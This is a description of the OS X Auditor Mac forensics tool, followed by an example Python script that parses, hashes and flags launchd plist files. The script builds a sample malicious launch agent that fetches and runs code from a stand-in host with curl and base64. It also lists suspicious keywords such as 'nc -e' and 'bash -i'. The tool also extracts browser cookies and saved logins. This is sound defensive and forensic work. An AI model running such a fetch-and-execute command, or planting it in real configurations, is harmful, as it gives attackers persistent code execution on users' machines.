
OS X Auditor – Mac Forensics Tool

OS X Auditor is a free Mac OS X computer forensics tool. It parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:

  • the kernel extensions
  • the system agents and daemons
  • the third-party agents and daemons
  • the old and deprecated system and third-party startup items
  • the users' launch agents
  • the users' downloaded files
  • the installed applications

It can also extract the following:

  • the users' quarantined files
  • the users' Safari history, downloads, top sites, LastSession, HTML5 databases and local storage
  • the users' Firefox cookies, downloads, form history, permissions, places and signons
  • the users' Chrome history and archived history, cookies, login data, top sites, web data, HTML5 databases and local storage
  • the users' social and email accounts
  • the WiFi access points the audited system has been connected to (and tries to geolocate them)

It also looks for suspicious keywords in the .plist files themselves.

OS X Auditor can also verify the reputation of each file against:

  • Team Cymru's Malware Hash Registry (MHR)
  • VirusTotal
  • your own local hash database

It can aggregate all logs from the following directories into a zipball:

  • /var/log (-> /private/var/log)
  • /Library/Logs
  • each user's ~/Library/Logs

The results can be rendered as a plain text log file or an HTML report, or sent to a syslog server.

Note: it requires Python 2.7.2 (2.7.9 also works).
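As an added example (not OS X Auditor's own code), the Python 3 script below does, on a constructed sample directory, the core of what the tool does for launch agents and daemons: parse each launchd .plist (XML or binary), hash it, reconstruct the command line launchd would execute, flag suspicious keywords, look the SHA-256 up in a local hash database, and form the DNS name a Team Cymru MHR lookup would query. The keyword list, the two sample plists and the `local_db` dictionary are assumptions made for this example; the launchd directories and the MHR TXT answer format are real, but the script makes no network query and runs entirely offline.

```python
import hashlib
import os
import plistlib
import tempfile

# launchd locations OS X Auditor walks on a live system (system agents/daemons,
# third-party agents/daemons, per-user agents). Real paths, listed for reference;
# the example below runs on a constructed temporary directory instead.
LAUNCHD_DIRS = (
    "/System/Library/LaunchAgents",
    "/System/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    "/Library/LaunchDaemons",
    os.path.expanduser("~/Library/LaunchAgents"),
)

# Assumed keyword list for this example; the tool's own list is not on this page.
SUSPICIOUS_KEYWORDS = ("curl", "wget", "bash -i", "/tmp/", "base64", "osascript", "nc -e")


def file_hashes(path):
    """MD5 (what the Team Cymru MHR is keyed on) and SHA-256 (for the local DB) of one file."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def launchd_command_line(plist):
    """Reconstruct what launchd would run from the Program / ProgramArguments keys."""
    args = list(plist.get("ProgramArguments", []))
    program = plist.get("Program")
    if program and (not args or args[0] != program):
        args.insert(0, program)
    return " ".join(str(a) for a in args)


def keyword_hits(text):
    """Return the suspicious keywords present in text, in list order."""
    lower = text.lower()
    return [k for k in SUSPICIOUS_KEYWORDS if k in lower]


def audit_plist(path, local_db):
    """Parse, hash and flag a single launchd plist; local_db maps sha256 -> verdict."""
    with open(path, "rb") as fh:
        plist = plistlib.load(fh)          # handles both XML and binary plists
    md5, sha256 = file_hashes(path)
    cmdline = launchd_command_line(plist)
    label = str(plist.get("Label", "<no Label>"))
    return {
        "path": path,
        "label": label,
        "cmdline": cmdline,
        "md5": md5,
        "sha256": sha256,
        "keyword_hits": keyword_hits(cmdline + " " + label),
        "local_db": local_db.get(sha256),  # None when the hash is not in the local DB
        "mhr_query": "%s.malware.hash.cymru.com" % md5,  # TXT name for a Team Cymru MHR lookup
    }


def audit_dirs(dirs, local_db):
    """Audit every .plist in the given directories, skipping ones that do not exist."""
    results = []
    for d in dirs:
        if not os.path.isdir(d):
            continue  # e.g. ~/Library/LaunchAgents is absent on a fresh account
        for name in sorted(os.listdir(d)):
            if name.endswith(".plist"):
                results.append(audit_plist(os.path.join(d, name), local_db))
    return results


def parse_mhr_answer(txt):
    """Parse a Team Cymru MHR TXT answer, '<unix timestamp> <detection percent>'."""
    ts, pct = txt.strip().split()
    return {"last_seen": int(ts), "detection_rate": int(pct)}


def build_sample_dir():
    """Constructed sample for this example: one benign and one suspicious agent."""
    base = tempfile.mkdtemp(prefix="launchagents_")
    benign = {"Label": "com.example.updater",
              "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
              "RunAtLoad": True}
    evil = {"Label": "com.apple.softwareupdate.helper",  # Apple-looking label in a user directory
            "ProgramArguments": ["/bin/sh", "-c",
                                 "curl -s http://example.invalid/p | base64 -d > /tmp/.u && sh /tmp/.u"],
            "RunAtLoad": True, "KeepAlive": True}
    for name, data in (("com.example.updater.plist", benign),
                       ("com.apple.softwareupdate.helper.plist", evil)):
        with open(os.path.join(base, name), "wb") as fh:
            plistlib.dump(data, fh)
    return base


if __name__ == "__main__":
    sample = build_sample_dir()
    for rec in audit_dirs([sample], local_db={}):
        flag = "SUSPICIOUS" if rec["keyword_hits"] else "ok"
        print("%-10s %s  %s" % (flag, rec["label"], rec["cmdline"]))
        print("           sha256=%s  mhr=%s" % (rec["sha256"], rec["mhr_query"]))
```

To run it against a live system, pass `LAUNCHD_DIRS` instead of the sample directory and a dictionary of known hashes as `local_db`; the `mhr_query` name can then be resolved as a DNS TXT record and fed to `parse_mhr_answer`.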
